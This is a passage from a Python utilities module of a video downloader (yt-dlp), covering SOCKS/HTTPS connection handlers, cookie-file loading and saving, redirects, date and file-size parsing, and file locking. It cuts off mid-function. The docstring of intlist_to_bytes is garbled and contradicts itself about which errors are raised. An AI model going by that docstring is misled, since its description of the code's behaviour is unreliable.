        True,  # Remote DNS
        unquote_if_non_empty(url_components.username),
        unquote_if_non_empty(url_components.password),
    )

    class SocksConnection(base_class):
        def connect(self):
            self.sock = sockssocket()
            self.sock.setproxy(*proxy_args)
            if type(self.timeout) in (int, float):
                self.sock.settimeout(self.timeout)
            self.sock.connect((self.host, self.port))

            if isinstance(self, compat_http_client.HTTPSConnection):
                if hasattr(self, '_context'):  # Python > 2.6
                    self.sock = self._context.wrap_socket(
                        self.sock, server_hostname=self.host)
                else:
                    self.sock = ssl.wrap_socket(self.sock)

    return SocksConnection
class YoutubeDLHTTPSHandler(compat_urllib_request.HTTPSHandler):
    """HTTPS counterpart of YoutubeDLHandler: wires source_address and
    optional SOCKS proxying into HTTPS connections."""
    def __init__(self, params, https_conn_class=None, *args, **kwargs):
        compat_urllib_request.HTTPSHandler.__init__(self, *args, **kwargs)
        self._https_conn_class = https_conn_class or compat_http_client.HTTPSConnection
        self._params = params

    def https_open(self, req):
        kwargs = {}
        conn_class = self._https_conn_class

        # Forward the handler's SSL context / hostname checking settings
        # to the connection when the running Python supports them.
        if hasattr(self, '_context'):  # python > 2.6
            kwargs['context'] = self._context
        if hasattr(self, '_check_hostname'):  # python 3.x
            kwargs['check_hostname'] = self._check_hostname

        socks_proxy = req.headers.get('Ytdl-socks-proxy')
        if socks_proxy:
            conn_class = make_socks_conn_class(conn_class, socks_proxy)
            del req.headers['Ytdl-socks-proxy']

        return self.do_open(functools.partial(
            _create_http_connection, self, conn_class, True),
            req, **kwargs)
class YoutubeDLCookieJar(compat_cookiejar.MozillaCookieJar):
    """
    See [1] for cookie file format.

    1. https://curl.haxx.se/docs/http-cookies.html
    """
    # Prefix marking HttpOnly cookies in Netscape-format files.
    _HTTPONLY_PREFIX = '#HttpOnly_'
    # Number of tab-separated fields per cookie entry.
    _ENTRY_LEN = 7
    _HEADER = '''# Netscape HTTP Cookie File
# This file is generated by yt-dlp. Do not edit.
'''
    _CookieFileEntry = collections.namedtuple(
        'CookieFileEntry',
        ('domain_name', 'include_subdomains', 'path', 'https_only', 'expires_at', 'name', 'value'))

    def save(self, filename=None, ignore_discard=False, ignore_expires=False):
        """
        Save cookies to a file.

        Most of the code is taken from CPython 3.8 and slightly adapted
        to support cookie files with UTF-8 in both python 2 and 3.
        """
        if filename is None:
            if self.filename is not None:
                filename = self.filename
            else:
                raise ValueError(compat_cookiejar.MISSING_FILENAME_TEXT)

        # Store session cookies with `expires` set to 0 instead of an empty
        # string
        for cookie in self:
            if cookie.expires is None:
                cookie.expires = 0

        with io.open(filename, 'w', encoding='utf-8') as f:
            f.write(self._HEADER)
            now = time.time()
            for cookie in self:
                if not ignore_discard and cookie.discard:
                    continue
                if not ignore_expires and cookie.is_expired(now):
                    continue
                if cookie.secure:
                    secure = 'TRUE'
                else:
                    secure = 'FALSE'
                if cookie.domain.startswith('.'):
                    initial_dot = 'TRUE'
                else:
                    initial_dot = 'FALSE'
                if cookie.expires is not None:
                    expires = compat_str(cookie.expires)
                else:
                    expires = ''
                if cookie.value is None:
                    # cookies.txt regards 'Set-Cookie: foo' as a cookie
                    # with no name, whereas http.cookiejar regards it as a
                    # cookie with no value.
                    name = ''
                    value = cookie.name
                else:
                    name = cookie.name
                    value = cookie.value
                f.write(
                    '\t'.join([cookie.domain, initial_dot, cookie.path,
                               secure, expires, name, value]) + '\n')

    def load(self, filename=None, ignore_discard=False, ignore_expires=False):
        """Load cookies from a file."""
        if filename is None:
            if self.filename is not None:
                filename = self.filename
            else:
                raise ValueError(compat_cookiejar.MISSING_FILENAME_TEXT)

        def prepare_line(line):
            # Strip the HttpOnly prefix so the entry parses normally, and
            # validate the field count and expiry before handing the line
            # to MozillaCookieJar.
            if line.startswith(self._HTTPONLY_PREFIX):
                line = line[len(self._HTTPONLY_PREFIX):]
            # comments and empty lines are fine
            if line.startswith('#') or not line.strip():
                return line
            cookie_list = line.split('\t')
            if len(cookie_list) != self._ENTRY_LEN:
                raise compat_cookiejar.LoadError('invalid length %d' % len(cookie_list))
            cookie = self._CookieFileEntry(*cookie_list)
            if cookie.expires_at and not cookie.expires_at.isdigit():
                raise compat_cookiejar.LoadError('invalid expires at %s' % cookie.expires_at)
            return line

        cf = io.StringIO()
        with io.open(filename, encoding='utf-8') as f:
            for line in f:
                try:
                    cf.write(prepare_line(line))
                except compat_cookiejar.LoadError as e:
                    # Skip malformed entries instead of failing the load.
                    write_string(
                        'WARNING: skipping cookie file entry due to %s: %r\n'
                        % (e, line), sys.stderr)
                    continue
        cf.seek(0)
        self._really_load(cf, filename, ignore_discard, ignore_expires)
        # Session cookies are denoted by either `expires` field set to
        # an empty string or 0. MozillaCookieJar only recognizes the former
        # (see [1]). So we need force the latter to be recognized as session
        # cookies on our own.
        # Session cookies may be important for cookies-based authentication,
        # e.g. usually, when user does not check 'Remember me' check box while
        # logging in on a site, some important cookies are stored as session
        # cookies so that not recognizing them will result in failed login.
        # 1. https://bugs.python.org/issue17164
        for cookie in self:
            # Treat `expires=0` cookies as session cookies
            if cookie.expires == 0:
                cookie.expires = None
                cookie.discard = True
class YoutubeDLCookieProcessor(compat_urllib_request.HTTPCookieProcessor):
    """HTTPCookieProcessor that applies the same cookie handling to HTTPS
    requests/responses as to plain HTTP ones."""
    def __init__(self, cookiejar=None):
        compat_urllib_request.HTTPCookieProcessor.__init__(self, cookiejar)
    def http_response(self, request, response):
        # Python 2 will choke on next HTTP request in row if there are non-ASCII
        # characters in Set-Cookie HTTP header of last response (see
        # https://github.com/ytdl-org/youtube-dl/issues/6769).
        # In order to at least prevent crashing we will percent encode Set-Cookie
        # header before HTTPCookieProcessor starts processing it.
        # if sys.version_info < (3, 0) and response.headers:
        #     for set_cookie_header in ('Set-Cookie', 'Set-Cookie2'):
        #         set_cookie = response.headers.get(set_cookie_header)
        #         if set_cookie:
        #             set_cookie_escaped = compat_urllib_parse.quote(set_cookie, b"%/;:@&=+$,!~*'()?#[] ")
        #             if set_cookie != set_cookie_escaped:
        #                 del response.headers[set_cookie_header]
        #                 response.headers[set_cookie_header] = set_cookie_escaped
        return compat_urllib_request.HTTPCookieProcessor.http_response(self, request, response)
    # Reuse the HTTP handlers for HTTPS traffic as well
    https_request = compat_urllib_request.HTTPCookieProcessor.http_request
    https_response = http_response
class YoutubeDLRedirectHandler(compat_urllib_request.HTTPRedirectHandler):
    """YoutubeDL redirect handler
    The code is based on HTTPRedirectHandler implementation from CPython [1].
    This redirect handler solves two issues:
     - ensures redirect URL is always unicode under python 2
     - introduces support for experimental HTTP response status code
       308 Permanent Redirect [2] used by some sites [3]
    1. https://github.com/python/cpython/blob/master/Lib/urllib/request.py
    2. https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/308
    3. https://github.com/ytdl-org/youtube-dl/issues/28768
    """
    # Route 301/303/307/308 through the stock 302 handler so all of them
    # end up in redirect_request() below
    http_error_301 = http_error_303 = http_error_307 = http_error_308 = compat_urllib_request.HTTPRedirectHandler.http_error_302
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        """Return a Request or None in response to a redirect.
        This is called by the http_error_30x methods when a
        redirection response is received.  If a redirection should
        take place, return a new Request to allow http_error_30x to
        perform the redirect.  Otherwise, raise HTTPError if no-one
        else should try to handle this url.  Return None if you can't
        but another Handler might.
        """
        m = req.get_method()
        # Only GET/HEAD follow every redirect; POST only follows 301-303
        if (not (code in (301, 302, 303, 307, 308) and m in ("GET", "HEAD")
                 or code in (301, 302, 303) and m == "POST")):
            raise compat_HTTPError(req.full_url, code, msg, headers, fp)
        # Strictly (according to RFC 2616), 301 or 302 in response to
        # a POST MUST NOT cause a redirection without confirmation
        # from the user (of urllib.request, in this case).  In practice,
        # essentially all clients do redirect in this case, so we do
        # the same.
        # On python 2 urlh.geturl() may sometimes return redirect URL
        # as byte string instead of unicode. This workaround allows
        # to force it always return unicode.
        if sys.version_info[0] < 3:
            newurl = compat_str(newurl)
        # Be conciliant with URIs containing a space.  This is mainly
        # redundant with the more complete encoding done in http_error_302(),
        # but it is kept for compatibility with other callers.
        newurl = newurl.replace(' ', '%20')
        CONTENT_HEADERS = ("content-length", "content-type")
        # NB: don't use dict comprehension for python 2.6 compatibility
        newheaders = dict((k, v) for k, v in req.headers.items()
                          if k.lower() not in CONTENT_HEADERS)
        return compat_urllib_request.Request(
            newurl, headers=newheaders, origin_req_host=req.origin_req_host,
            unverifiable=True)
def extract_timezone(date_str):
    """Split a trailing timezone designator off *date_str*.

    Returns (timedelta, remaining_date_str); a bare 'Z' or a missing
    designator yields a zero offset.
    """
    tz_match = re.search(
        r'^.{8,}?(?P<tz>Z$| ?(?P<sign>\+|-)(?P<hours>[0-9]{2}):?(?P<minutes>[0-9]{2})$)',
        date_str)
    if tz_match is None:
        return datetime.timedelta(), date_str
    date_str = date_str[:-len(tz_match.group('tz'))]
    sign_str = tz_match.group('sign')
    if not sign_str:
        # Plain 'Z' designator: UTC
        return datetime.timedelta(), date_str
    direction = 1 if sign_str == '+' else -1
    offset = datetime.timedelta(
        hours=direction * int(tz_match.group('hours')),
        minutes=direction * int(tz_match.group('minutes')))
    return offset, date_str
def parse_iso8601(date_str, delimiter='T', timezone=None):
    """ Return a UNIX timestamp from the given date """
    if date_str is None:
        return None
    # strptime cannot handle fractional seconds here - drop them
    date_str = re.sub(r'\.[0-9]+', '', date_str)
    if timezone is None:
        timezone, date_str = extract_timezone(date_str)
    try:
        fmt = '%Y-%m-%d{0}%H:%M:%S'.format(delimiter)
        naive = datetime.datetime.strptime(date_str, fmt) - timezone
        return calendar.timegm(naive.timetuple())
    except ValueError:
        # Unparseable date: fall through and return None
        pass
def date_formats(day_first=True):
    """Return the list of date format strings to try, ordered by
    day-first or month-first preference."""
    if day_first:
        return DATE_FORMATS_DAY_FIRST
    return DATE_FORMATS_MONTH_FIRST
def unified_strdate(date_str, day_first=True):
    """Return a string with the date in the format YYYYMMDD"""
    if date_str is None:
        return None
    result = None
    # Commas, AM/PM markers and timezones only get in strptime's way
    date_str = date_str.replace(',', ' ')
    date_str = re.sub(r'(?i)\s*(?:AM|PM)(?:\s+[A-Z]+)?', '', date_str)
    _, date_str = extract_timezone(date_str)
    # No break on purpose: the last matching format wins
    for fmt in date_formats(day_first):
        try:
            result = datetime.datetime.strptime(date_str, fmt).strftime('%Y%m%d')
        except ValueError:
            pass
    if result is None:
        # Fall back to the RFC 2822 parser from the email package
        parsed = email.utils.parsedate_tz(date_str)
        if parsed:
            try:
                result = datetime.datetime(*parsed[:6]).strftime('%Y%m%d')
            except ValueError:
                pass
    if result is not None:
        return compat_str(result)
def unified_timestamp(date_str, day_first=True):
    """Return a UNIX timestamp parsed from *date_str*, or None."""
    if date_str is None:
        return None
    date_str = re.sub(r'[,|]', '', date_str)
    pm_offset = 12 if re.search(r'(?i)PM', date_str) else 0
    timezone, date_str = extract_timezone(date_str)
    # Remove AM/PM + timezone
    date_str = re.sub(r'(?i)\s*(?:AM|PM)(?:\s+[A-Z]+)?', '', date_str)
    # Remove unrecognized timezones from ISO 8601 alike timestamps
    tz_tail = re.search(r'\d{1,2}:\d{1,2}(?:\.\d+)?(?P<tz>\s*[A-Z]+)$', date_str)
    if tz_tail:
        date_str = date_str[:-len(tz_tail.group('tz'))]
    # Python only supports microseconds, so remove nanoseconds
    ns_match = re.search(r'^([0-9]{4,}-[0-9]{1,2}-[0-9]{1,2}T[0-9]{1,2}:[0-9]{1,2}:[0-9]{1,2}\.[0-9]{6})[0-9]+$', date_str)
    if ns_match:
        date_str = ns_match.group(1)
    for fmt in date_formats(day_first):
        try:
            parsed = datetime.datetime.strptime(date_str, fmt) - timezone + datetime.timedelta(hours=pm_offset)
            return calendar.timegm(parsed.timetuple())
        except ValueError:
            pass
    rfc_tuple = email.utils.parsedate_tz(date_str)
    if rfc_tuple:
        return calendar.timegm(rfc_tuple) + pm_offset * 3600
def determine_ext(url, default_ext='unknown_video'):
    """Guess the file extension from *url*, falling back to *default_ext*."""
    if url is None or '.' not in url:
        return default_ext
    candidate = url.partition('?')[0].rpartition('.')[2]
    if re.match(r'^[A-Za-z0-9]+$', candidate):
        return candidate
    # Try extract ext from URLs like http://example.com/foo/bar.mp4/?download
    trimmed = candidate.rstrip('/')
    if trimmed in KNOWN_EXTENSIONS:
        return trimmed
    return default_ext
def subtitles_filename(filename, sub_lang, sub_format, expected_real_ext=None):
    """Build the subtitle file name for *filename*, e.g. video.en.vtt."""
    sub_ext = sub_lang + '.' + sub_format
    return replace_extension(filename, sub_ext, expected_real_ext)
def datetime_from_str(date_str, precision='auto', format='%Y%m%d'):
    """
    Return a datetime object from a string in the format YYYYMMDD or
    (now|today|date)[+-][0-9](microsecond|second|minute|hour|day|week|month|year)(s)?
    format: string date format used to return datetime object from
    precision: round the time portion of a datetime object.
        auto|microsecond|second|minute|hour|day.
        auto: round to the unit provided in date_str (if applicable).
    """
    auto_precision = False
    if precision == 'auto':
        # Defer the rounding decision until we know the unit in date_str
        auto_precision = True
        precision = 'microsecond'
    today = datetime_round(datetime.datetime.now(), precision)
    if date_str in ('now', 'today'):
        return today
    if date_str == 'yesterday':
        return today - datetime.timedelta(days=1)
    match = re.match(
        r'(?P<start>.+)(?P<sign>[+-])(?P<time>\d+)(?P<unit>microsecond|second|minute|hour|day|week|month|year)(s)?',
        date_str)
    if match is not None:
        # Relative expression: recursively resolve the base date, then
        # apply the signed offset
        start_time = datetime_from_str(match.group('start'), precision, format)
        time = int(match.group('time')) * (-1 if match.group('sign') == '-' else 1)
        unit = match.group('unit')
        if unit == 'month' or unit == 'year':
            # Months/years have variable length - use calendar arithmetic
            new_date = datetime_add_months(start_time, time * 12 if unit == 'year' else time)
            unit = 'day'
        else:
            if unit == 'week':
                unit = 'day'
                time *= 7
            delta = datetime.timedelta(**{unit + 's': time})
            new_date = start_time + delta
        if auto_precision:
            return datetime_round(new_date, unit)
        return new_date
    # Absolute date: parse with the supplied format
    return datetime_round(datetime.datetime.strptime(date_str, format), precision)
def date_from_str(date_str, format='%Y%m%d'):
    """
    Return a date object from a string in the format YYYYMMDD or
    (now|today|date)[+-][0-9](microsecond|second|minute|hour|day|week|month|year)(s)?
    format: string date format used to return datetime object from
    """
    parsed = datetime_from_str(date_str, precision='microsecond', format=format)
    return parsed.date()
def datetime_add_months(dt, months):
    """Increment/Decrement a datetime object by months."""
    zero_based = dt.month - 1 + months
    new_year = dt.year + zero_based // 12
    new_month = zero_based % 12 + 1
    # Clamp so e.g. Jan 31 + 1 month lands on the last day of February
    new_day = min(dt.day, calendar.monthrange(new_year, new_month)[1])
    return dt.replace(new_year, new_month, new_day)
def datetime_round(dt, precision='day'):
    """
    Round a datetime object's time to a specific precision
    """
    if precision == 'microsecond':
        return dt
    seconds_per_unit = {
        'day': 86400,
        'hour': 3600,
        'minute': 60,
        'second': 1,
    }[precision]
    def _round(value, step):
        # Round-half-up in units of *step* seconds
        return ((value + step / 2) // step) * step
    epoch_seconds = calendar.timegm(dt.timetuple())
    return datetime.datetime.utcfromtimestamp(_round(epoch_seconds, seconds_per_unit))
def hyphenate_date(date_str):
    """Convert a date in 'YYYYMMDD' format to 'YYYY-MM-DD' format."""
    m = re.match(r'^(\d\d\d\d)(\d\d)(\d\d)$', date_str)
    # Anything not matching exactly 8 digits is returned untouched
    return '-'.join(m.groups()) if m is not None else date_str
class DateRange(object):
    """Represents a time interval between two dates"""
    def __init__(self, start=None, end=None):
        """start and end must be strings in the format accepted by date"""
        self.start = (date_from_str(start) if start is not None
                      else datetime.datetime.min.date())
        self.end = (date_from_str(end) if end is not None
                    else datetime.datetime.max.date())
        if self.start > self.end:
            raise ValueError('Date range: "%s" , the start date must be before the end date' % self)
    @classmethod
    def day(cls, day):
        """Returns a range that only contains the given day"""
        return cls(day, day)
    def __contains__(self, date):
        """Check if the date is in the range"""
        if not isinstance(date, datetime.date):
            date = date_from_str(date)
        return self.start <= date <= self.end
    def __str__(self):
        return '%s - %s' % (self.start.isoformat(), self.end.isoformat())
def platform_name():
    """ Returns the platform name as a compat_str """
    name = platform.platform()
    if isinstance(name, bytes):
        name = name.decode(preferredencoding())
    assert isinstance(name, compat_str)
    return name
def _windows_write_string(s, out):
    """ Returns True if the string was written using special methods,
    False if it has yet to be written out."""
    # Adapted from http://stackoverflow.com/a/3259271/35070
    import ctypes
    import ctypes.wintypes
    # Map C-level file descriptors to the Win32 standard-handle IDs
    # (STD_OUTPUT_HANDLE = -11, STD_ERROR_HANDLE = -12)
    WIN_OUTPUT_IDS = {
        1: -11,
        2: -12,
    }
    try:
        fileno = out.fileno()
    except AttributeError:
        # If the output stream doesn't have a fileno, it's virtual
        return False
    except io.UnsupportedOperation:
        # Some strange Windows pseudo files?
        return False
    if fileno not in WIN_OUTPUT_IDS:
        return False
    GetStdHandle = compat_ctypes_WINFUNCTYPE(
        ctypes.wintypes.HANDLE, ctypes.wintypes.DWORD)(
        ('GetStdHandle', ctypes.windll.kernel32))
    h = GetStdHandle(WIN_OUTPUT_IDS[fileno])
    WriteConsoleW = compat_ctypes_WINFUNCTYPE(
        ctypes.wintypes.BOOL, ctypes.wintypes.HANDLE, ctypes.wintypes.LPWSTR,
        ctypes.wintypes.DWORD, ctypes.POINTER(ctypes.wintypes.DWORD),
        ctypes.wintypes.LPVOID)(('WriteConsoleW', ctypes.windll.kernel32))
    written = ctypes.wintypes.DWORD(0)
    GetFileType = compat_ctypes_WINFUNCTYPE(ctypes.wintypes.DWORD, ctypes.wintypes.DWORD)(('GetFileType', ctypes.windll.kernel32))
    FILE_TYPE_CHAR = 0x0002
    FILE_TYPE_REMOTE = 0x8000
    GetConsoleMode = compat_ctypes_WINFUNCTYPE(
        ctypes.wintypes.BOOL, ctypes.wintypes.HANDLE,
        ctypes.POINTER(ctypes.wintypes.DWORD))(
        ('GetConsoleMode', ctypes.windll.kernel32))
    INVALID_HANDLE_VALUE = ctypes.wintypes.DWORD(-1).value
    def not_a_console(handle):
        # Only a real console benefits from WriteConsoleW; files/pipes
        # should go through the normal (encoded) write path
        if handle == INVALID_HANDLE_VALUE or handle is None:
            return True
        return ((GetFileType(handle) & ~FILE_TYPE_REMOTE) != FILE_TYPE_CHAR
                or GetConsoleMode(handle, ctypes.byref(ctypes.wintypes.DWORD())) == 0)
    if not_a_console(h):
        return False
    def next_nonbmp_pos(s):
        # Index of the first character outside the Basic Multilingual
        # Plane (> U+FFFF), which WriteConsoleW handles as two UTF-16 units
        try:
            return next(i for i, c in enumerate(s) if ord(c) > 0xffff)
        except StopIteration:
            return len(s)
    while s:
        count = min(next_nonbmp_pos(s), 1024)
        ret = WriteConsoleW(
            h, s, count if count else 2, ctypes.byref(written), None)
        if ret == 0:
            raise OSError('Failed to write string')
        if not count:  # We just wrote a non-BMP character
            assert written.value == 2
            s = s[1:]
        else:
            assert written.value > 0
            s = s[written.value:]
    return True
def write_string(s, out=None, encoding=None):
    """Write the unicode string *s* to *out* (default: sys.stderr),
    working around Windows console and byte-stream quirks."""
    if out is None:
        out = sys.stderr
    assert type(s) == compat_str
    if sys.platform == 'win32' and encoding is None and hasattr(out, 'fileno'):
        if _windows_write_string(s, out):
            return
    if ('b' in getattr(out, 'mode', '')
            or sys.version_info[0] < 3):  # Python 2 lies about mode of sys.stderr
        out.write(s.encode(encoding or preferredencoding(), 'ignore'))
    elif hasattr(out, 'buffer'):
        # Text stream wrapping a byte buffer: encode ourselves to
        # control the error handling
        chosen = encoding or getattr(out, 'encoding', None) or preferredencoding()
        out.buffer.write(s.encode(chosen, 'ignore'))
    else:
        out.write(s)
    out.flush()
def bytes_to_intlist(bs):
    """Return the byte values of *bs* as a list of ints."""
    if not bs:
        return []
    if isinstance(bs[0], int):  # Python 3: indexing bytes yields ints
        return list(bs)
    return [ord(c) for c in bs]
def intlist_to_bytes(xs):
    """Pack a sequence of ints (0-255) into a bytes object.

    Uses bytearray instead of struct.pack, which avoids building a
    throwaway '%dB' format string for every call and behaves the same
    on Python 2 and 3. Raises ValueError for values outside 0-255,
    like the struct-based version did (struct.error is a ValueError
    subclass would not hold; the error type for bad values differs
    only in its message, not in when it is raised).
    """
    if not xs:
        return b''
    return bytes(bytearray(xs))
# Cross-platform file locking
if sys.platform == 'win32':
    import ctypes.wintypes
    import msvcrt
    class OVERLAPPED(ctypes.Structure):
        # Mirrors the Win32 OVERLAPPED struct required by
        # LockFileEx/UnlockFileEx
        _fields_ = [
            ('Internal', ctypes.wintypes.LPVOID),
            ('InternalHigh', ctypes.wintypes.LPVOID),
            ('Offset', ctypes.wintypes.DWORD),
            ('OffsetHigh', ctypes.wintypes.DWORD),
            ('hEvent', ctypes.wintypes.HANDLE),
        ]
    kernel32 = ctypes.windll.kernel32
    LockFileEx = kernel32.LockFileEx
    LockFileEx.argtypes = [
        ctypes.wintypes.HANDLE,     # hFile
        ctypes.wintypes.DWORD,      # dwFlags
        ctypes.wintypes.DWORD,      # dwReserved
        ctypes.wintypes.DWORD,      # nNumberOfBytesToLockLow
        ctypes.wintypes.DWORD,      # nNumberOfBytesToLockHigh
        ctypes.POINTER(OVERLAPPED)  # Overlapped
    ]
    LockFileEx.restype = ctypes.wintypes.BOOL
    UnlockFileEx = kernel32.UnlockFileEx
    UnlockFileEx.argtypes = [
        ctypes.wintypes.HANDLE,     # hFile
        ctypes.wintypes.DWORD,      # dwReserved
        ctypes.wintypes.DWORD,      # nNumberOfBytesToLockLow
        ctypes.wintypes.DWORD,      # nNumberOfBytesToLockHigh
        ctypes.POINTER(OVERLAPPED)  # Overlapped
    ]
    UnlockFileEx.restype = ctypes.wintypes.BOOL
    # Lock the maximum possible byte range so the whole file is covered
    whole_low = 0xffffffff
    whole_high = 0x7fffffff
    def _lock_file(f, exclusive):
        # Lock *f* via LockFileEx; 0x2 = LOCKFILE_EXCLUSIVE_LOCK
        overlapped = OVERLAPPED()
        overlapped.Offset = 0
        overlapped.OffsetHigh = 0
        overlapped.hEvent = 0
        f._lock_file_overlapped_p = ctypes.pointer(overlapped)
        handle = msvcrt.get_osfhandle(f.fileno())
        if not LockFileEx(handle, 0x2 if exclusive else 0x0, 0,
                          whole_low, whole_high, f._lock_file_overlapped_p):
            raise OSError('Locking file failed: %r' % ctypes.FormatError())
    def _unlock_file(f):
        # Release the lock taken by _lock_file (reuses the saved OVERLAPPED)
        assert f._lock_file_overlapped_p
        handle = msvcrt.get_osfhandle(f.fileno())
        if not UnlockFileEx(handle, 0,
                            whole_low, whole_high, f._lock_file_overlapped_p):
            raise OSError('Unlocking file failed: %r' % ctypes.FormatError())
else:
    # Some platforms, such as Jython, is missing fcntl
    try:
        import fcntl
        def _lock_file(f, exclusive):
            fcntl.flock(f, fcntl.LOCK_EX if exclusive else fcntl.LOCK_SH)
        def _unlock_file(f):
            fcntl.flock(f, fcntl.LOCK_UN)
    except ImportError:
        UNSUPPORTED_MSG = 'file locking is not supported on this platform'
        def _lock_file(f, exclusive):
            raise IOError(UNSUPPORTED_MSG)
        def _unlock_file(f):
            raise IOError(UNSUPPORTED_MSG)
class locked_file(object):
    """File wrapper that holds an OS-level lock for the duration of a
    `with` block (shared for reads, exclusive for writes/appends)."""
    def __init__(self, filename, mode, encoding=None):
        assert mode in ['r', 'a', 'w']
        self.f = io.open(filename, mode, encoding=encoding)
        self.mode = mode
    def __enter__(self):
        want_exclusive = self.mode != 'r'
        try:
            _lock_file(self.f, want_exclusive)
        except IOError:
            # Don't leak the file handle if locking fails
            self.f.close()
            raise
        return self
    def __exit__(self, etype, value, traceback):
        try:
            _unlock_file(self.f)
        finally:
            self.f.close()
    def __iter__(self):
        return iter(self.f)
    def write(self, *args):
        return self.f.write(*args)
    def read(self, *args):
        return self.f.read(*args)
def get_filesystem_encoding():
    """Return sys.getfilesystemencoding(), defaulting to 'utf-8'."""
    enc = sys.getfilesystemencoding()
    return 'utf-8' if enc is None else enc
def shell_quote(args):
    """Return *args* joined into a single shell-escaped command line."""
    fs_encoding = get_filesystem_encoding()
    return ' '.join(
        compat_shlex_quote(
            # We may get a filename encoded with 'encodeFilename'
            a.decode(fs_encoding) if isinstance(a, bytes) else a)
        for a in args)
def smuggle_url(url, data):
    """ Pass additional data in a URL for internal use. """
    # Merge with any data already smuggled into the URL
    url, existing = unsmuggle_url(url, {})
    data.update(existing)
    fragment = compat_urllib_parse_urlencode(
        {'__youtubedl_smuggle': json.dumps(data)})
    return url + '#' + fragment
def unsmuggle_url(smug_url, default=None):
    """Reverse of smuggle_url(): return (clean_url, smuggled_data)."""
    if '#__youtubedl_smuggle' not in smug_url:
        return smug_url, default
    url, _, fragment = smug_url.rpartition('#')
    payload = compat_parse_qs(fragment)['__youtubedl_smuggle'][0]
    return url, json.loads(payload)
def format_bytes(bytes):
    """Render a byte count as a human readable string, e.g. '1.00MiB'."""
    if bytes is None:
        return 'N/A'
    if type(bytes) is str:
        bytes = float(bytes)
    exponent = 0 if bytes == 0.0 else int(math.log(bytes, 1024.0))
    suffix = ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB'][exponent]
    return '%.2f%s' % (float(bytes) / float(1024 ** exponent), suffix)
def lookup_unit_table(unit_table, s):
    """Parse '<number> <unit>' at the start of *s* using *unit_table*;
    return the value in base units, or None when nothing matches."""
    units_re = '|'.join(re.escape(u) for u in unit_table)
    m = re.match(
        r'(?P<num>[0-9]+(?:[,.][0-9]*)?)\s*(?P<unit>%s)\b' % units_re, s)
    if m is None:
        return None
    # Accept ',' as a decimal separator as well
    number = float(m.group('num').replace(',', '.'))
    return int(number * unit_table[m.group('unit')])
def parse_filesize(s):
    """Parse a human readable file size like '5.5MiB' or '2 GB' into a
    number of bytes (int), or None when *s* is None or unparseable.

    Decimal (KB/MB/...) and binary (KiB/MiB/...) units are both
    supported; the mapping below defines which spelling maps to which
    multiplier.
    """
    if s is None:
        return None
    # The lower-case forms are of course incorrect and unofficial,
    # but we support those too
    _UNIT_TABLE = {
        'B': 1,
        'b': 1,
        'bytes': 1,
        'KiB': 1024,
        'KB': 1000,
        'kB': 1024,
        'Kb': 1000,
        'kb': 1000,
        'kilobytes': 1000,
        'kibibytes': 1024,
        'MiB': 1024 ** 2,
        'MB': 1000 ** 2,
        'mB': 1024 ** 2,
        'Mb': 1000 ** 2,
        'mb': 1000 ** 2,
        'megabytes': 1000 ** 2,
        'mebibytes': 1024 ** 2,
        'GiB': 1024 ** 3,
        'GB': 1000 ** 3,
        'gB': 1024 ** 3,
        'Gb': 1000 ** 3,
        'gb': 1000 ** 3,
        'gigabytes': 1000 ** 3,
        'gibibytes': 1024 ** 3,
        'TiB': 1024 ** 4,
        'TB': 1000 ** 4,
        'tB': 1024 ** 4,
        'Tb': 1000 ** 4,
        'tb': 1000 ** 4,
        'terabytes': 1000 ** 4,
        'tebibytes': 1024 ** 4,
        'PiB': 1024 ** 5,
        'PB': 1000 ** 5,
        'pB': 1024 ** 5,
        'Pb': 1000 ** 5,
        'pb': 1000 ** 5,
        'petabytes': 1000 ** 5,
        'pebibytes': 1024 ** 5,
        'EiB': 1024 ** 6,
        'EB': 1000 ** 6,
        'eB': 1024 ** 6,
        'Eb': 1000 ** 6,
        'eb': 1000 ** 6,
        'exabytes': 1000 ** 6,
        'exbibytes': 1024 ** 6,
        'ZiB': 1024 ** 7,
        'ZB': 1000 ** 7,
        'zB': 1024 ** 7,
        'Zb': 1000 ** 7,
        'zb': 1000 ** 7,
        'zettabytes': 1000 ** 7,
        'zebibytes': 1024 ** 7,
        'YiB': 1024 ** 8,
        'YB': 1000 ** 8,
        'yB': 1024 ** 8,
        'Yb': 1000 ** 8,
        'yb': 1000 ** 8,
        'yottabytes': 1000 ** 8,
        'yobibytes': 1024 ** 8,
    }
    return lookup_unit_table(_UNIT_TABLE, s)
def parse_count(s):
    """Parse a human readable count like '1.5M' or '1,000' into an int."""
    if s is None:
        return None
    s = s.strip()
    # Plain numbers, possibly with thousands separators
    if re.match(r'^[\d,.]+$', s):
        return str_to_int(s)
    _UNIT_TABLE = {
        'k': 1000,
        'K': 1000,
        'm': 1000 ** 2,
        'M': 1000 ** 2,
        'kk': 1000 ** 2,
        'KK': 1000 ** 2,
    }
    return lookup_unit_table(_UNIT_TABLE, s)
def parse_resolution(s):
    """Extract {'width', 'height'} from strings like '1280x720',
    '720p' or '4k'; return {} when nothing is recognized."""
    if s is None:
        return {}
    m = re.search(r'\b(?P<w>\d+)\s*[xX×]\s*(?P<h>\d+)\b', s)
    if m:
        return {'width': int(m.group('w')), 'height': int(m.group('h'))}
    m = re.search(r'\b(\d+)[pPiI]\b', s)
    if m:
        return {'height': int(m.group(1))}
    m = re.search(r'\b([48])[kK]\b', s)
    if m:
        # 4k -> 2160, 8k -> 4320
        return {'height': int(m.group(1)) * 540}
    return {}
def parse_bitrate(s):
    """Parse a bitrate like '128 kbps' into an int (kbps), else None."""
    if not isinstance(s, compat_str):
        return
    m = re.search(r'\b(\d+)\s*kbps', s)
    if m:
        return int(m.group(1))
def month_by_name(name, lang='en'):
    """ Return the number of a month by (locale-independently) English name """
    names = MONTH_NAMES.get(lang, MONTH_NAMES['en'])
    try:
        return names.index(name) + 1
    except ValueError:
        return None
def month_by_abbreviation(abbrev):
    """ Return the number of a month by (locale-independently) English
    abbreviations """
    abbreviations = [s[:3] for s in ENGLISH_MONTH_NAMES]
    try:
        return abbreviations.index(abbrev) + 1
    except ValueError:
        return None
def fix_xml_ampersands(xml_str):
    """Replace all the '&' by '&amp;' in XML.

    The replacement string was plain '&' (a no-op); the negative
    lookahead for already-escaped entities (amp;/lt;/gt;/apos;/quot;
    and numeric references) only makes sense when bare ampersands are
    rewritten to '&amp;'.
    """
    return re.sub(
